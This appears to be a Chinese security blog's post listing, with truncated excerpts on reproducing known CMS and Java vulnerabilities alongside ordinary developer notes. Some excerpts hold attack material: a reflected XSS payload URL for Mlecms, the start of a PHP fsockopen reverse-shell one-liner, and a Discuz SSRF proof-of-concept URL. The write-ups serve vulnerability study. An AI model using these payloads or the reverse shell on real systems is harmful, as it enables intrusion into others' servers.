- 博客(57)
- 收藏
- 关注
转载 jar包中存在包名和类名都相同的情况
情况: 在maven中引入两个包都有项目的包名和类名,只是jar包的名字不同。两个包的一部分在代码中的不同地方都需要用到。网上找的大部分都是: 只有改变编译器优先选择的jar顺序(这个顺序是可以改变的):包jdk放到前面就好了。解决:在maven中也是这样,只要调整好dependency的顺序,选定优先选择哪个包就能解决 <depend...
2019-07-09 12:25:00
1668
转载 java反序列化字节转字符串工具
https://github.com/NickstaDB/SerializationDumperSerializationDumper-v1.1.jar用法 :java -jar SerializationDumper-v1.1.jar aced000573720026636e2e656d61792e...转载于:https://www.cnblogs.co...
2019-06-25 16:41:00
774
转载 certbot更新错误
自动更新老是提示这个错误。root@vultr:~/certbot# ./certbot-autoUpgrading certbot-auto 0.29.1 to 0.34.2...Couldn't verify signature of downloaded certbot-auto. Command '[u'openssl', u'dgst', u'-sha256',...
2019-05-27 21:58:00
815
转载 Java下的tinylog日志打印
做个笔记。做某个功能时需要DEBUG调试日志,但是直接System.out.println 是打印在终端,有些情况下是看不到输出的,所以需要用日志框架去打印输出值。经过搜索完以后发现Logback性能等方面都比较好,打算选它做日志框架时,发现其他的jar包里面也有Logback,起冲突了,修改这个jar包又比较麻烦。于是又找了一个比较小众的日志框架tinylog。tin...
2019-05-24 16:55:00
561
转载 rmi的调用
在java8 121版本以前,只要这样就能任意代码rmiTest.javaimport javax.naming.InitialContext;import javax.naming.NamingException;public class rmiTest { public static void main(String[] args) thro...
2019-05-09 19:56:00
114
转载 linux下hex转ascii
场景:在wireshark里面提取response包的值。echo -n "1f8b08000000000000030cd335b2e580014" | xxd -r -p >1.gzip 转载于:https://www.cnblogs.com/yangxiaodi/p/10636004.html...
2019-04-01 14:02:00
1038
转载 CSP攻略
看完三篇文章应该就懂了csp是干嘛的。https://www.cnblogs.com/Wayou/p/intro_to_content_security_policy.htmlhttps://www.w3.org/TR/CSP3/http://drops.xmd5.com/static/drops/papers-15120.html如果内部要使用CSP(1)搭建...
2018-12-28 22:53:00
659
转载 ThinkPHP5代码执行的简单分析
漏洞影响版本:ThinkPHP 5.0.5-5.0.22ThinkPHP 5.1.0-5.1.30漏洞复现: 一.mac的debug环境搭建。 一键化环境搭建工具: mamp pro ,调试工具 PHPstorm 打开mamp pro,设置左上角的file->Edit Template, 设置httpd.conf (监听本地)...
2018-12-13 18:41:00
531
转载 使用IEDA远程调试
下面演示在docker中调试代码。 使用vulhub作为演示。 下载vulhub,进入vulhub/fastjson/vuln/ 编辑docker-compose.yml ,在最后新建一行加入 - "8081:8081" 然后开始编译和运行环境 docker-compose build docker-compose up -d 环...
2018-12-06 15:40:00
153
转载 Apache Roller 5.0.3 XXE漏洞分析
下载5.0.2的版本来分析5.0.2的war包地址 http://archive.apache.org/dist/roller/roller-5/v5.0.2/bin/roller-weblogger-5.0.2-for-javaee.zip从web.xml入手分析,可以看到如下servlet映射 <servlet> <se...
2018-09-21 10:49:00
203
转载 fastjson 反序列化漏洞笔记,比较乱
现在思路还是有点乱,希望后面能重新写先上pon.xml 包<?xml version="1.0" encoding="UTF-8"?><project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-insta...
2018-09-15 19:52:00
496
转载 JAVA常见安全问题复现
地址来源于乌云知识库,作者z_zz_zzz0x01 任意文件下载web.xml的配置: <servlet> <description></description> <display-name>DownloadAction</display-name> ...
2018-05-21 15:48:00
175
转载 Spring Integration Zip不安全解压(CVE-2018-1261)漏洞复现
不敢说分析,还是太菜了,多学习。文章来源: 猎户安全实验室存在漏洞的源码下载地址:https://github.com/spring-projects/spring-integration-extensions/releases/tag/zip.v1.0.0.RELEASE代码下载两眼相望了好久,第一次弄这些东西,踩了好久的坑,边踩边学习。用的是IDEA来复现: 终...
2018-05-14 16:54:00
372
转载 php一句话反弹bash shell
来源:https://www.leavesongs.com/PHP/backshell-via-php.html用到了,记录一下$sock = fsockopen($ip, $port);$descriptorspec = array( 0 => $sock, 1 => $sock, 2 => ...
2018-04-21 09:38:00
525
转载 dnslog搭建
为什么想重写这个呢,想说后面扫描ssrf和命令执行的时候,能快速改成自己想要的api,更容易修改一些。工具改自:https://github.com/bugScanTeam/DNSLog需要两个域名和一台服务器。推荐这里买一个.pw域名,可以自定义dns服务器。https://cn.resellerclub.com/上面两张图是在resellerclub...
2018-02-14 23:21:00
3022
转载 阅读DSSS.py 并修改成支持python3.6
项目地址:https://github.com/stamparm/DSSS功能:一款小型注入工具代码如下URL:https://github.com/stamparm/DSSS/blob/master/dsss.py 1 if __name__ == "__main__": 2 print "%s #v%s\n by: %s\n" % (NAME, VE...
2018-02-04 18:14:00
348
转载 将python代码打印成pdf
将python代码打印成pdf,打印出来很丑,完全不能看。mac下:pycharm编辑器有print的功能,但是会提示: Error: No print service found.所以需要一个pdf虚拟机。https://github.com/rodyager/RWTS-PDFwriter安装以后就能使用。打印出来太丑没法看转载于:https:/...
2018-01-26 21:30:00
2166
转载 Python的hasattr() getattr() setattr() 函数使用方法详解 (转)
来自:https://www.cnblogs.com/cenyu/p/5713686.htmlhasattr(object, name)判断一个对象里面是否有name属性或者name方法,返回BOOL值,有name特性返回True, 否则返回False。需要注意的是name要用括号括起来>>> class test():... name="xia...
2018-01-12 14:09:00
76
转载 burp的dns记录功能
写个备忘。先点copy复制url,然后生成的url就能用了。一关就没了,比较鸡肋些,不适合持久的,适合马上就能见效果的那种。转载于:https://www.cnblogs.com/yangxiaodi/p/8135316.html...
2017-12-28 13:50:00
2273
转载 python2.7-巡风源码阅读
推荐个脚本示例网站:https://www.programcreek.com/python/example/404/thread.start_new_thread,里面可以搜索函数在代码中的写法,只有部分函数。github地址:https://github.com/ysrc/xunfeng 根据官网给出的安装方法安装,然后启动run.sh#!/bin/bashsu...
2017-12-17 15:13:00
203
转载 《linux 网络日志分析与流量监控》记录
mac中有个本机连接vpn的日志,/private/var/log/ppp.log 消除日志(echo "" >/private/var/log/ppp.log )linux中的各种日志: (1)ssh日志错误记录 /var/log/secure (2)dns日志 /var/log/messages ,剥离方法: cat/var/log/messages...
2017-11-25 11:22:00
1244
转载 mysql \N 的疑惑
\N 在mysql查询为NULL好像是可以代替成一个字符串,并与后面的单词隔绝,我的理解为下图这样还是不懂为啥会这样。转载于:https://www.cnblogs.com/yangxiaodi/p/7605906.html...
2017-09-28 11:33:00
236
转载 osx mitmproxy ssl 错误
记录一下,总是在这里折腾。cd ~cd .mitmproxycp mitmproxy-ca-cert.pem ~/然后到目录下双击mitmproxy-ca-cert.pem ,在钥匙串中的登录框信任他,就能进行监听。不知道重启以后会不会失效(待实验)转载于:https://www.cnblogs.com/yangxiaodi/p/7483569.html...
2017-09-06 11:07:00
232
转载 持久化 XSS:ServiceWorkers 利用
来源:http://www.mottoin.com/95058.html来源:https://www.owasp.org/images/3/35/2017-04-20-JSONPXSS.pdfServiceWorkers 看完好像需要三个条件。 1.只在 HTTPS 下工作 2.安装ServiceWorker的脚本需要当前域下,且返回的 content-type 包含 /j...
2017-08-17 14:24:00
367
转载 chall.tasteless.eu 中的注入题
第一题好像就很难,看了payload,算是涨见识了,感觉有点为了猜而猜。题目给我们的时候是这样的:http://chall.tasteless.eu/level1/index.php?dir=ASCasc,desc 一对好基友,所以猜测是order by 后的注入。然后有个提示:Capture the flag! hint: table level1_flag column f...
2017-06-24 21:21:00
357
转载 preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞
编辑器坏了 (:今天看到这个phpmyadmin的代码执行,https://www.waitalone.cn/phpmyadmin-preg_replace-rce.html记录一下:preg_replace()函数http://php.net/manual/zh/function.preg-replace.phpphp 7.0.0不再支持 /e修饰符。 ...
2017-06-22 17:27:00
215
转载 seacms6.5 注入漏洞1
---恢复内容开始---需要开启/data/admin/isapi.txt ,当里面的数值为1时,就可以报错注入存在漏洞的页面:zyapi.php function cj(){ global $dsql,$rtype,$rpage,$rkey,$rday,$action,$app_apiver,$app_apipagenum,$cfg_basehost,$...
2017-06-22 09:58:00
349
转载 cmseasy CmsEasy_5.6_20151009 无限制报错注入(parse_str()的坑)
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137013.htmlparse_str()引发的注入,//parse_str()的作用是解析字符串并且把字符串注册成变量,第二个参数$arr是一个数组,parse_str()之前会先urldecode,也就是会二次url解码,实现单引号逃逸。漏洞距离现在好像...
2017-06-08 16:41:00
273
转载 Mlecms 反射型xss && 后台任意文件下载
应该算0day吧,自己分析出来的,有点鸡肋,不过小cms分析确实比较简单。xss地址:search.php?word=a><img+src=1+onerror=alert`1`>a&type=1对于word的参数,他的过滤是这样的 $trim_str = ' .,;[]|+-=_`~!@#$%^&*()<>?{}...
2017-06-06 16:22:00
470
转载 Mlecms Getshell
参考来源:https://bbs.ichunqiu.com/thread-13703-1-1.html位于:/inc/include/globals.php 第24-28行。有个任意变量覆盖。foreach(array('_GET','_POST','_COOKIE') as $_request){ foreach($$_request as $i => &...
2017-06-05 17:47:00
320
转载 Discuz利用UC_KEY进行前台getshell
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0137991.html先通过uc_key把恶意代码保存在/uc_client/data/cache/badwords.php,然后利用preg_replace() 进行任意代码执行。先附上来源中的脚本。修改了一些代码。<?php$timestamp = ti...
2017-06-02 19:25:00
1086
转载 Discuz 5.x 6.x 7.x 前台SQL注入漏洞
来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-071516.html漏洞出现在/include/editpost.inc.php。 if($thread['special'] == 1 && ($alloweditpoll || $isorigauthor) && !empty($p...
2017-06-02 09:13:00
455
转载 Discuz!另一处SSRF无须登陆无须条件
漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0151179.html看看poc:http://phpstudy.com/Discuz_X2/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://11aadds332.nrcu...
2017-05-31 23:51:00
343
转载 Discuz! 7.x 反射型xss
引用:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-084097.html在/include/global.func.php 文件中 第1036-1119行中function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) ...
2017-05-29 20:59:00
262
转载 Discuz! 6.x/7.x 全局变量防御绕过导致命令执行
参考:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080723.html文件位于:include/discuzcode.func.php 第97-241行 函数 discuzcode()有这么一句话,$GLOBALS['_DCACHE']['smilies']['searcharray'], $GLOBALS['...
2017-05-29 20:05:00
280
转载 Discuz!X 系列 HTTP_X_FORWARDED_FOR 绕过限制进行密码爆破
分析有个不对头的地方:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-080211.html后面再补这个漏洞比较简单。我们看到配置文件来。/include/common.inc.php 第86-94行。if(getenv('HTTP_CLIENT_IP') && strcasecmp(geten...
2017-05-29 11:25:00
544
转载 discuz7.2 faq.php 注入漏洞分析
写在前面的话:分析完整个漏洞,不得不感叹,发现漏洞的人真的好细心呀。在分析整个漏洞之前,没看poc,然后就直接看faq.php 准备试试自己发现漏洞的能力,但是分析完一整个php,也是卡在 in() 这里,因为整个faq.php就这里的参数是可控的。但是也没看出什么来,最后看了poc之后焕然大悟,然后开始感慨。先看poc吧,按着poc来分析。/faq.php?actio...
2017-05-28 16:49:00
534
转载 PHPCMS v9.5.6 通杀getshell(前台)
漏洞url:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-062881.html很好的fuzz思路。文章提到:文件名前面的数字是被"干掉"字符的十进制数字,可以看出%81--%99会被干掉.该特性雷同Windows下对"."和" "(空格), ::$DATA的忽略。这个特性可以用来绕过安全狗,比如 xxx.php. ...
2017-05-27 15:31:00
550
转载 PHPCMS某处设计缺陷可致authkey泄露
在分析几个phpcms的漏洞就换分析其他的,换换口味。漏洞来源:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0106892.htmlswfupload上传页面输出了 MD5(auth_key+sess_id)。函数位于 /phpcms/modules/attachment/functions/global.func.php...
2017-05-25 20:41:00
454
转载 PHPCMS v9.5.8-设计缺陷可重置前台任意用户密码
验证。参考漏洞:http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0152291.html漏洞出现在/phpcms/modules/member/index.php 第1687-1756行public_forget_password_username()函数 public function public_forget_...
2017-05-23 23:10:00
448
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人